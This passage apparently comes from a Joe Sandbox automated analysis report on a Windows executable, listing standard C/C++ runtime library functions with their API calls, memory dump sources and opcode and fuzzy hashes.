                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                            • Opcode ID: 4fdd39745adb7345a6936d400da34406e941e9a737caad057a4d27695deafba5
                                                                                                                                                                                                                            • Instruction ID: 350d9619ba4047d08ebbcbcddd1c67275e8776923b73e5cb780caae0e0238b17
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fdd39745adb7345a6936d400da34406e941e9a737caad057a4d27695deafba5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D241A434A00209AFCF10DF68C885AAEBBB5AF55318F148195F859AB392D731EE51CFD1
                                                                                                                                                                                                                            Function 001A71EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,F8250000,?,AB531964,?,001A72FC,0019EE66,?,F8250000,00000000), ref: 001A72B0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                                                                                                                            • Opcode ID: 6db3bffc711ff31d10cd8e744e83122d91acb3c1a88f3c379213269c2c92a556
                                                                                                                                                                                                                            • Instruction ID: 30308bfda471d636d0964868880c149e0b7bde2d9bb3bc1202b360bc8f4fdf5c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6db3bffc711ff31d10cd8e744e83122d91acb3c1a88f3c379213269c2c92a556
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4213A3AA45210A7CB32AB61EC54B9A3768AF53360F290216F915E72D0D730EF01C6E0
                                                                                                                                                                                                                            Function 001E338B Relevance: 10.6, APIs: 7, Instructions: 55COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • UnDecorator::UScore.LIBCMT ref: 001E3395
                                                                                                                                                                                                                            • DName::DName.LIBCMT ref: 001E33A1
                                                                                                                                                                                                                              • Part of subcall function 001E106C: DName::doPchar.LIBCMT ref: 001E109D
                                                                                                                                                                                                                            • UnDecorator::getScopedName.LIBCMT ref: 001E33E0
                                                                                                                                                                                                                            • DName::operator+=.LIBCMT ref: 001E33EA
                                                                                                                                                                                                                            • DName::operator+=.LIBCMT ref: 001E33F9
                                                                                                                                                                                                                            • DName::operator+=.LIBCMT ref: 001E3405
                                                                                                                                                                                                                            • DName::operator+=.LIBCMT ref: 001E3412
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1480779885-0
                                                                                                                                                                                                                            • Opcode ID: 7491704a406c1c578bfc7b1f4575f9842b7a48a94faccf0b99b655ecd725c168
                                                                                                                                                                                                                            • Instruction ID: 78191f4e9ebe49e095d43c982263041613ec26dfa0cd5f1a8dd7009bf3e8f01f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7491704a406c1c578bfc7b1f4575f9842b7a48a94faccf0b99b655ecd725c168
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C11A371A00684AFD719EB25C85ABADBBA0EF20301F044095F0129B2D2CB70DB81CB41
                                                                                                                                                                                                                            Function 001973C5 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 001973CC
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 001973D6
                                                                                                                                                                                                                            • int.LIBCPMT ref: 001973ED
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • codecvt.LIBCPMT ref: 00197410
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00197427
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00197447
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00197454
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2133458128-0
                                                                                                                                                                                                                            • Opcode ID: b83049d65d6de4685eeaff54798ac9ec26b39d63af27ba5e7d732eca5cd03d49
                                                                                                                                                                                                                            • Instruction ID: 84870491a8d04261862ea8d05ae0ccebbc61a891c73630b256a33adc09a09913
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b83049d65d6de4685eeaff54798ac9ec26b39d63af27ba5e7d732eca5cd03d49
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A01F531D24126EBCF05EBA8E8456BD7BB1AF90724F280549F8106B2D2CF749D42C781
                                                                                                                                                                                                                            Function 001E53BF Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4267394785-0
                                                                                                                                                                                                                            • Opcode ID: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
                                                                                                                                                                                                                            • Instruction ID: 05b660717e249a6f870f3868b471e026768dda4750a265f5b0d0d5685e6008bb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd9685c0f8e99762da6b47b8c6f7231e6a09b9523451af01b9522ecad555d412
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 792196B6A00DCAAADF18DFBAC9459FDBB766F0C305F954165A111D7541DB348F408710
                                                                                                                                                                                                                            Function 001E53B5 Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4267394785-0
                                                                                                                                                                                                                            • Opcode ID: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
                                                                                                                                                                                                                            • Instruction ID: 4a339399c0c567593f47ff80118b7ad24a450b14b2e718d896bc57f9d4f1f579
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41adee5c73aa1e88243f3158e2c40ed16f52e1afc6b9bf2c17e63ec85b627ffa
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 962193B6A00DCAAADF18EFBAC9459FEBB76AF0C305F954166A111D7641DB34CF008B10
                                                                                                                                                                                                                            Function 001E53AB Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4267394785-0
                                                                                                                                                                                                                            • Opcode ID: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
                                                                                                                                                                                                                            • Instruction ID: 9b126d5411be8b910aa58530216a37b53609fbcd1b6d21b09dc2acdb3f4fa061
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5ff01363cc5be2414fde705ddc2477139869efe325205967f2b79d65d07f3e5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 012193B6A00DCAAADF18EFBAC9459FEBB76AF0C305F954166A111D7641DB348F408B10
                                                                                                                                                                                                                            Function 001E53C9 Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator=$NameName::Name::operator+Name::operator+=$Decorator::getName::doPcharTypeoperator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4267394785-0
                                                                                                                                                                                                                            • Opcode ID: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
                                                                                                                                                                                                                            • Instruction ID: 3184aaab31480a38321e0ab0b3e31c235d80401c9e4a64b0be91c8b0f00e9cd5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04bf772949b8752548d84cbfff0da56238cecf44966dde39219307ebaddb036f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 072193B6A00DCAAADF18EFBAC9459FEBB76AF0C305F954166A111D7641DB348F008B10
                                                                                                                                                                                                                            Function 0019CA94 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0019CA8B,0019AD89,001969F4,AB531964,?,?,?,?,001B52D0,000000FF), ref: 0019CAA2
                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0019CAB0
                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0019CAC9
                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,0019CA8B,0019AD89,001969F4,AB531964,?,?,?,?,001B52D0,000000FF), ref: 0019CB1B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                            • Opcode ID: 351789899969d4f20248e5a2532e1e4a77e30d3b180ebeba39e85da2ac4f75b1
                                                                                                                                                                                                                            • Instruction ID: 358fccb8e432dabd1db1e6376dd2748fdc373ddf668da55287609b9d25111967
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 351789899969d4f20248e5a2532e1e4a77e30d3b180ebeba39e85da2ac4f75b1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E01F7322087116FEF246BB57C86D6A6B45EB217B5330033DF176524F1EF658D4092C0
                                                                                                                                                                                                                            Function 001EA05B Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: __lock_free$___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1181530324-0
                                                                                                                                                                                                                            • Opcode ID: f576442123b04c527e99995057e5f798a06d57a0fbdba5833e7da996cdf46145
                                                                                                                                                                                                                            • Instruction ID: 97c8c7a352d1610b681c9b17ac3d532278ea59ea4cbf22fa7950bcbf8c4db450
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f576442123b04c527e99995057e5f798a06d57a0fbdba5833e7da996cdf46145
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43112531501B44ABDB34AFBA9406B1D77E4AF14B10F24442EF099D72C2CB34EE80C666
                                                                                                                                                                                                                            Function 001A3BE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,AB531964,?,?,00000000,001B54C3,000000FF,?,001A3B70,001A3CA0,?,001A3B44,00000000), ref: 001A3C15
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001A3C27
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,001B54C3,000000FF,?,001A3B70,001A3CA0,?,001A3B44,00000000), ref: 001A3C49
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                            • Opcode ID: e6910ae28573f37ad2ee109a23893abed2cf04eb1e52240a00be539cc9efafe9
                                                                                                                                                                                                                            • Instruction ID: 971c0daa0c5d623321860ab8f1a100f4cc7b17033ad3c30155a1a460c24588f5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6910ae28573f37ad2ee109a23893abed2cf04eb1e52240a00be539cc9efafe9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9901DB32944625FFDB159F51DC09FEEBBF8FB04B11F040625F911A26D0DB789940CA40
                                                                                                                                                                                                                            Function 001D6D68 Relevance: 7.8, APIs: 5, Instructions: 297COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _memset$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2583058844-0
                                                                                                                                                                                                                            • Opcode ID: e34bf048b61c1259719f24b5a9ebcdb7e29330d4219f1e2d480e2a365f4dc5d7
                                                                                                                                                                                                                            • Instruction ID: 1dd2e523ecce7ee3fbdf45d2ab30c7c7d5fd777b70bc965f8dbf2bfc740f16fc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e34bf048b61c1259719f24b5a9ebcdb7e29330d4219f1e2d480e2a365f4dc5d7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6C12A72D0022AABCF21EB64DC45AEE777DAF18304F0141A6FA09B3251DB359F858F50
                                                                                                                                                                                                                            Function 00198BAA Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00198BBE
                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(00000003,?,00000002,?,001934CC,?,?), ref: 00198BDD
                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(00000003,00000000,00000000,?,00000002,?,001934CC,?,?), ref: 00198C0B
                                                                                                                                                                                                                            • TryAcquireSRWLockExclusive.KERNEL32(00000003,00000000,00000000,?,00000002,?,001934CC,?,?), ref: 00198C66
